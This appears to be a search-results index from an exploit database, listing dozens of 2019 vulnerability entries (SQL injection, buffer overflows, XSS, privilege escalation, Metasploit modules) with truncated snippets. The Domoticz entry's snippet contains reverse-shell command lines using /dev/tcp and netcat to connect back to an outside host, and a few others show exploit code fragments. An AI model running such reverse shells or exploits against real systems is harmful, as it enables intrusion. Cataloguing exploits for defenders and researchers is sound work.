41207 matches found
Joomla! Component ARI Quiz 3.7.4 - SQL Injection
Joomla! Component ARI Quiz 3.7.4 - SQL Injection Exploit Title: Joomla! Component ARI Quiz 3.7.4 - SQL Injection Exploit Author: Mr Winst0n Author E-mail: [email protected] Discovery Date: April 27, 2019 Vendor Homepage: http://www.ari-soft.com Software Link :...
Intelbras IWR 3000N - Denial of Service (Remote Reboot)
Intelbras IWR 3000N - Denial of Service Remote Reboot /bin/bash PoC based on CVE-2019-11415 created by Social Engineering Neo. Credit: https://1.337.zone/2019/04/08/intelbras-iwr-3000n-any-version-dos-on-malformed-login-request/ A malformed login request allows remote attackers to cause a denial ...
Domoticz 4.10577 - Unauthenticated Remote Command Execution
Domoticz 4.10577 - Unauthenticated Remote Command Execution !/usr/bin/env python -- coding: utf-8 -- Exploit Title: Unauthenticated Remote Command Execution on Domoticz & /dev/tcp/172.17.0.1/4444 0&1 &' ./exploit.py -zipcmd http://localhost:8080/ 'nc 10.0.2.2 4444 -e /bin/bash &' import argparse...
Agent Tesla Botnet - Information Disclosure
Agent Tesla Botnet - Information Disclosure Exploit Title: Agent Tesla Botnet - Information Disclosure Disclosure Vulnerability Google Dork: n/a Date: 26/11/2018 Exploit Author: n4pst3r Vendor Homepage: unkn0wn Software Link: http://www.agenttesla.com/ ¡ Down ! Version: unkn0wn Tested on: Windows...
HumHub 1.3.12 - Cross-Site Scripting
HumHub 1.3.12 - Cross-Site Scripting Exploit Title: HumHub 1.3.12 - Cross-Site Scripting Exploit Author: Kağan EĞLENCE Vendor Homepage: https://humhub.org/ Version: 1.3.12 CVE : CVE-2019-11564 Url :...
Freefloat FTP Server 1.0 - STOR Remote Buffer Overflow
Freefloat FTP Server 1.0 - STOR Remote Buffer Overflow Exploit Title: Free Float FTP 1.0 "STOR" Remote Buffer Overflow Google Dork: N/A Date: 4/26/2019 Exploit Author: Kevin Randall Vendor Homepage: Software Link: http://www.freefloat.com/software/freefloatftpserver.zip Version: Firmware: Free...
Spring Cloud Config 2.1.x - Path Traversal (Metasploit)
Spring Cloud Config 2.1.x - Path Traversal Metasploit This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Spring Cloud Config Server Directory Traversal', 'Description' = %q This module exploits an...
NSauditor 3.1.2.0 - Community Denial of Service (PoC)
NSauditor 3.1.2.0 - Community Denial of Service PoC Exploit Title: NSauditor 3.1.2.0 - 'Community' Denial of Service PoC Discovery by: Victor Mondragón Discovery Date: 2019-04-24 Vendor Homepage: www.nsauditor.com Software Link: http://www.nsauditor.com/downloads/nsauditorsetup.exe Tested Version...
Apache Pluto 3.0.0 3.0.1 - Persistent Cross-Site Scripting
Apache Pluto 3.0.0 3.0.1 - Persistent Cross-Site Scripting Exploit Title: Stored XSS Date: 25-04-2019 Exploit Author: Dhiraj Mishra Vendor Homepage: https://portals.apache.org/pluto Software Link: https://portals.apache.org/pluto/download.html Version: 3.0.0, 3.0.1 Tested on: Ubuntu 16.04 LTS CVE...
NSauditor 3.1.2.0 - Name Denial of Service (PoC)
NSauditor 3.1.2.0 - Name Denial of Service PoC Exploit Title: NSauditor 3.1.2.0 - 'Name' Denial of Service PoC Discovery by: Victor Mondragón Discovery Date: 2019-04-24 Vendor Homepage: www.nsauditor.com Software Link: http://www.nsauditor.com/downloads/nsauditorsetup.exe Tested Version: 3.1.2.0...
systemd - DynamicUser can Create setuid Binaries when Assisted by Another Process
systemd - DynamicUser can Create setuid Binaries when Assisted by Another Process This bug report describes a bug in systemd that allows a service with DynamicUser in collaboration with another service or user to create a setuid binary that can be used to access its UID beyond the lifetime of the...
JioFi 4G M2S 1.0.2 - Denial of Service
JioFi 4G M2S 1.0.2 - Denial of Service Exploit Title: cgi-bin/qcmap_web_cgi on JioFi 4G M2S 1.0.2 devices allows a DoS Hang via the mask POST parameter Exploit Author: Vikas Chaudhary Date: 21-01-2019 Vendor Homepage: https://www.jio.com/ Hardware Link:...
HeidiSQL 10.1.0.5464 - Denial of Service (PoC)
HeidiSQL 10.1.0.5464 - Denial of Service PoC Exploit Title: HeidiSQL Portable 10.1.0.5464 - Denial of Service PoC Discovery by: Victor Mondragón Discovery Date: 2019-04-24 Vendor Homepage: https://www.heidisql.com/ Software Link:...
Backup Key Recovery 2.2.4 - Denial of Service (PoC)
Backup Key Recovery 2.2.4 - Denial of Service PoC Exploit Title: Backup Key Recovery 2.2.4 - 'Name' Denial of Service PoC Discovery by: Victor Mondragón Discovery Date: 2019-04-24 Vendor Homepage: www.nsauditor.com Software Link: http://www.nsauditor.com/downloads/backeyrecoverysetup.exe Tested...
osTicket 1.11 - Cross-Site Scripting Local File Inclusion
osTicket 1.11 - Cross-Site Scripting Local File Inclusion Exploit Title: osTicket v1.11 - Cross-Site Scripting to Local File Inclusion Date: 09.04.2019 Exploit Author: Özkan Mustafa Akkuş AkkuS @ehakkus Contact: https://pentest.com.tr Vendor Homepage: https://osticket.com Software Link:...
JioFi 4G M2S 1.0.2 - mask Cross-Site Scripting
JioFi 4G M2S 1.0.2 - mask Cross-Site Scripting Exploit Title: cgi-bin/qcmap_web_cgi on JioFi 4G M2S 1.0.2 devices has XSS and HTML injection via the mask POST parameter. Exploit Author: Vikas Chaudhary Date: 21-01-2019 Vendor Homepage: https://www.jio.com/ Hardware Link:...
Lavavo CD Ripper 4.20 - License Activation Name Buffer Overflow (SEH)
Lavavo CD Ripper 4.20 - License Activation Name Buffer Overflow SEH Exploit Title: Lavavo CD Ripper 4.20 Local Seh Exploit Date: 25.04.2019 Vendor Homepage:https://www.lavavosoftware.com Software Link: https://lavavo-cd-ripper.jaleco.com/download Exploit Author: Achilles Tested Version: 4.20 Test...
AnMing MP3 CD Burner 2.0 - Denial of Service (PoC)
AnMing MP3 CD Burner 2.0 - Denial of Service PoC Exploit Title: AnMing MP3 CD Burner 2.0 Local Dos Exploit Date: 25.04.2019 Vendor Homepage:http://www.ddz1977.com/ Software Link:...
Google Chrome 72.0.3626.121 74.0.3725.0 - NewFixedDoubleArray Integer Overflow
Google Chrome 72.0.3626.121 74.0.3725.0 - NewFixedDoubleArray Integer Overflow VULNERABILITY DETAILS https://cs.chromium.org/chromium/src/v8/src/heap/factory.cc?rcl=dd689541d3815d64b4b39f6a41603248c71aa00e&l=496 Handle Factory::NewFixedDoubleArrayint length, PretenureFlag pretenure DCHECKLE0,...
VirtualBox 6.0.4 r128413 - COM RPC Interface Code Injection Host Privilege Escalation
VirtualBox 6.0.4 r128413 - COM RPC Interface Code Injection Host Privilege Escalation VirtualBox: COM RPC Interface Code Injection Host EoP Platform: VirtualBox 6.0.4 r128413 x64 on Windows 10 1809 Class: Elevation of Privilege Summary: The hardened VirtualBox process on a Windows host doesn’t...
systemd - Lack of Seat Verification in PAM Module Permits Spoofing Active Session to polkit
systemd - Lack of Seat Verification in PAM Module Permits Spoofing Active Session to polkit As documented at , for any action, a polkit policy can specify separate levels of required authentication based on whether a client is: - in an active session on a local console - in an inactive session on...
Linux - Missing Locking in Siemens R3964 Line Discipline Race Condition
Linux - Missing Locking in Siemens R3964 Line Discipline Race Condition The Siemens R3964 line discipline code in drivers/tty/n_r3964.c has a few races around its ioctl handler; for example, the handler for R3964_ENABLE_SIGNALS just allocates and deletes elements in a linked list with zero locking...
Ross Video DashBoard 8.5.1 - Insecure Permissions
Ross Video DashBoard 8.5.1 - Insecure Permissions Ross Video DashBoard 8.5.1 Insecure Permissions Vendor: Ross Video Ltd. Product web page: https://www.rossvideo.com Affected version: 8.5.1 Summary: DashBoard is a free and open platform from Ross Video for facility control and monitoring that...
Linux - page->_refcount Overflow via FUSE
Linux - page->_refcount Overflow via FUSE Linux: page->_refcount overflow via FUSE with 140GiB RAM usage Tested on: Debian Buster distro kernel "4.19.0-1-amd64 1 SMP Debian 4.19.12-1 2018-12-22" KVM guest with 160000MiB RAM A while back, there was some discussion about possible overflows of the...
UliCMS 2019.2 2019.1 - Multiple Cross-Site Scripting
UliCMS 2019.2 2019.1 - Multiple Cross-Site Scripting Exploit Title: UliCMS - 2019.2 , 2019.1 - Multiple Cross-Site Scripting Google Dork: intext:"by UliCMS" Exploit Author: Kağan EĞLENCE Vendor Homepage: https://en.ulicms.de/ Version: 2019.2 , 2019.1 CVE : CVE-2019-11398 Vulnerability 1 Url :...
74CMS 5.0.1 - Cross-Site Request Forgery (Add New Admin User)
74CMS 5.0.1 - Cross-Site Request Forgery Add New Admin User Exploit Title: 74CMS v5.0.1 has a CSRF vulnerability to add a new admin user Date: 2019-04-14 Exploit Author: ax8 Vendor Homepage: https://github.com/Li-Siyuan Software Link: http://www.74cms.com/download/index.html Version: v5.0.1 CVE :...
Ease Audio Converter 5.30 - .mp4 Denial of Service (PoC)
Ease Audio Converter 5.30 - .mp4 Denial of Service PoC Exploit Title: Ease Audio Converter 5.30 Audio Cutter Dos Exploit Date: 19.04.19 Vendor Homepage:http://www.audiotool.net/download.htm Software Link: http://www.audiotool.net/download/audioconverter.exe Exploit Author: Achilles Tested Version...
Google Chrome 73.0.3683.103 V8 JavaScript Engine - Out-of-Memory in Invalid Table Size Denial of Service (PoC)
Google Chrome 73.0.3683.103 V8 JavaScript Engine - Out-of-Memory in Invalid Table Size Denial of Service PoC var arr1 = 0,1; function ObjCreatemake this.make = make; var obj1 = new ObjCreate; function main arr1.reducef3; Object.getOwnPropertyDescriptorsArray99.joinobj1.make; function f3 obj1"make...
WordPress Plugin Contact Form Builder 1.0.67 - Cross-Site Request Forgery Local File Inclusion
WordPress Plugin Contact Form Builder 1.0.67 - Cross-Site Request Forgery Local File Inclusion Exploit Title: Contact Form Builder CSRF → LFI Date: 2019-03-17 Exploit Author: Panagiotis Vagenas Vendor Homepage: http://web-dorado.com/ Software Link: https://wordpress.org/plugins/contact-form-build...
Msvod 10 - Cross-Site Request Forgery (Change User Information)
Msvod 10 - Cross-Site Request Forgery Change User Information Exploit Title: Msvod v10 has a CSRF vulnerability to change user information Date: 2019-04-14 Exploit Author: ax8 Vendor Homepage: https://github.com/Li-Siyuan Software Link: https://www.msvodx.com/ Version: v10 CVE : CVE-2019-11375...
LabF nfsAxe 3.7 Ping Client - Host IP Buffer Overflow (Direct Ret)
LabF nfsAxe 3.7 Ping Client - Host IP Buffer Overflow Direct Ret !/usr/bin/python Exploit Title: LabF nfsAxe 3.7 Ping Client - Buffer Overflow Vanilla Date: 20-04-2019 Exploit Author: Dino Covotsos - Telspace Systems Vendor Homepage: http://www.labf.com/nfsaxe Version: 3.7 Software Link :...
QNAP myQNAPcloud Connect 1.3.4.0317 - UsernamePassword Denial of Service
QNAP myQNAPcloud Connect 1.3.4.0317 - UsernamePassword Denial of Service !/usr/bin/python Exploit Title: QNAP myQNAPcloud Connect "Username/Password" DOS Date: 19/04/2019 Exploit Author: Dino Covotsos - Telspace Systems Vendor Homepage: https://www.qnap.com Version: 1.3.4.0317 and below are...
ManageEngine Applications Manager 14.0 - Authentication Bypass Remote Command Execution (Metasploit)
ManageEngine Applications Manager 14.0 - Authentication Bypass Remote Command Execution Metasploit This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule "ManageEngine Applications Manager %q This modul...
Oracle Business Intelligence 11.1.1.9.0 12.2.1.3.0 12.2.1.4.0 - Directory Traversal
Oracle Business Intelligence 11.1.1.9.0 12.2.1.3.0 12.2.1.4.0 - Directory Traversal Exploit Title: Directory traversal in Oracle Business Intelligence Date: 16.04.19 Exploit Author: @vah13 Vendor Homepage: http://oracle.com Software Link:...
Oracle Business Intelligence XML Publisher 11.1.1.9.0 12.2.1.3.0 12.2.1.4.0 - XML External Entity Injection
Oracle Business Intelligence XML Publisher 11.1.1.9.0 12.2.1.3.0 12.2.1.4.0 - XML External Entity Injection Exploit Title: XXE in Oracle Business Intelligence and XML Publisher Date: 16.04.19 Exploit Author: @vah13 Vendor Homepage: http://oracle.com Software Link:...
ManageEngine Applications Manager 11.0 14.0 - SQL Injection Remote Code Execution (Metasploit)
ManageEngine Applications Manager 11.0 14.0 - SQL Injection Remote Code Execution Metasploit This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule "ManageEngine Applications Manager 11.0 %q This module...
Evernote 7.9 - Code Execution via Path Traversal
Evernote 7.9 - Code Execution via Path Traversal Exploit Title: Code execution via path traversal Date: 17-04-2019 Exploit Author: Dhiraj Mishra Vendor Homepage: http://evernote.com/ Software Link: https://evernote.com/download Version: 7.9 Tested on: macOS Mojave v10.14.4 CVE: CVE-2019-10038...
Netwide Assembler (NASM) 2.14rc15 - NULL Pointer Dereference (PoC)
Netwide Assembler NASM 2.14rc15 - NULL Pointer Dereference PoC Exploit Title: Netwide Assembler NASM 2.14rc15 NULL Pointer Dereference PoC Date: 2018-09-05 Exploit Author: Fakhri Zulkifli Vendor Homepage: https://www.nasm.us/ Software Link: https://www.nasm.us/pub/nasm/releasebuilds/?C=M;O=D...
Oracle Java Runtime Environment - Heap Corruption During TTF font Rendering in GlyphIterator::setCurrGlyphID
Oracle Java Runtime Environment - Heap Corruption During TTF font Rendering in GlyphIterator::setCurrGlyphID A heap corruption was observed in Oracle Java Runtime Environment version 8u202 latest at the time of this writing while fuzz-testing the processing of TrueType fonts. It manifests itself ...
Oracle Java Runtime Environment - Heap Corruption During TTF font Rendering in sc_FindExtrema4
Oracle Java Runtime Environment - Heap Corruption During TTF font Rendering in sc_FindExtrema4 A heap corruption was observed in Oracle Java Runtime Environment version 8u202 latest at the time of this writing while fuzz-testing the processing of TrueType, implemented in a proprietary t2k library...
DHCP Server 2.5.2 - Denial of Service (PoC)
DHCP Server 2.5.2 - Denial of Service PoC Exploit Title: DHCP Server 2.5.2 - Denial of Service PoC Discovery by: Victor Mondragón Discovery Date: 2019-04-16 Vendor Homepage: http://www.dhcpserver.de/cms/ Software Link: http://www.dhcpserver.de/cms/wp-content/plugins/download-attachments Tested...
ASUS HG100 - Denial of Service
ASUS HG100 - Denial of Service Exploit Title: ASUS HG100 devices denial of service (DOS) via IPv4 packets/SlowHTTPDOS Date: 2019-04-14 Exploit Author: YinT Wang; Vendor Homepage: www.asus.com Version: Hardware version: HG100, Firmware version: 1.05.12 Tested on: Current 1.05.12 CVE : CVE-2018-11492 1...
MailCarrier 2.51 - POP3 RETR SEH Buffer Overflow
MailCarrier 2.51 - POP3 RETR SEH Buffer Overflow !/usr/bin/python Exploit Title: MailCarrier 2.51 - SEH Remote Buffer Overflow in "RETR" commandPOP3 Date: 16/04/2019 Exploit Author: Dino Covotsos - Telspace Systems Vendor Homepage: https://www.tabslab.com/ Version: 2.51 Software Link: N.A Contact...
Microsoft Windows 10 1809 - LUAFV LuafvCopyShortName Arbitrary Short Name Privilege Escalation
Microsoft Windows 10 1809 - LUAFV LuafvCopyShortName Arbitrary Short Name Privilege Escalation Windows: LUAFV LuafvCopyShortName Arbitrary Short Name EoP Platform: Windows 10 1809 not tested earlier Class: Elevation of Privilege Security Boundary per Windows Security Service Criteria: User bounda...
Microsoft Windows 10 1809 - LUAFV PostLuafvPostReadWrite SECTION_OBJECT_POINTERS Race Condition Privilege Escalation
Microsoft Windows 10 1809 - LUAFV PostLuafvPostReadWrite SECTION_OBJECT_POINTERS Race Condition Privilege Escalation Windows: LUAFV PostLuafvPostReadWrite SECTION_OBJECT_POINTERS Race Condition EoP Platform: Windows 10 1809 not tested earlier Class: Elevation of Privilege Security Boundary per Window...
Microsoft Windows 10 1809 1709 - CSRSS SxSSrv Cached Manifest Privilege Escalation
Microsoft Windows 10 1809 1709 - CSRSS SxSSrv Cached Manifest Privilege Escalation Windows: CSRSS SxSSrv Cached Manifest EoP Platform: Windows 10 1809, 1709 Class: Elevation of Privilege Security Boundary per Windows Security Service Criteria: User boundary and others Summary: The SxS manifest...
PCHelpWare V2 1.0.0.5 - SC Denial of Service (PoC)
PCHelpWare V2 1.0.0.5 - SC Denial of Service PoC -- coding: utf-8 -- Exploit Title: PCHelpWareV2 1.0.0.5 - 'SC' Denial of Service PoC Date: 15/04/2019 Author: Alejandra Sánchez Vendor Homepage: https://www.uvnc.com/home.html Software Link: http://www.uvnc.eu/download/pchw2/PCHelpWareV2.msi Versio...
Joomla Core 1.5.0 - 3.9.4 - Directory Traversal Authenticated Arbitrary File Deletion
Joomla Core 1.5.0 - 3.9.4 - Directory Traversal Authenticated Arbitrary File Deletion Exploit Title: Joomla Core 1.5.0 through 3.9.4 - Directory Traversal && Authenticated Arbitrary File Deletion Date: 2019-March-13 Exploit Author: Haboob Team Web Site: haboob.sa Email: [email protected] Softwar...
Microsoft Windows 10 1809 - LUAFV Delayed Virtualization MAXIMUM_ACCESS DesiredAccess Privilege Escalation
Microsoft Windows 10 1809 - LUAFV Delayed Virtualization MAXIMUM_ACCESS DesiredAccess Privilege Escalation Windows: LUAFV Delayed Virtualization MAXIMUM_ACCESS DesiredAccess EoP Platform: Windows 10 1809 not tested earlier Class: Elevation of Privilege Security Boundary per Windows Security Service...
Microsoft Windows 10 1809 - LUAFV NtSetCachedSigningLevel Device Guard Bypass
Microsoft Windows 10 1809 - LUAFV NtSetCachedSigningLevel Device Guard Bypass Windows: LUAFV NtSetCachedSigningLevel Device Guard Bypass Platform: Windows 10 1809 not tested earlier. Note I’ve not tested this on Windows 10 SMode. Class: Security Feature Bypass Summary: The NtSetCachedSigningLevel...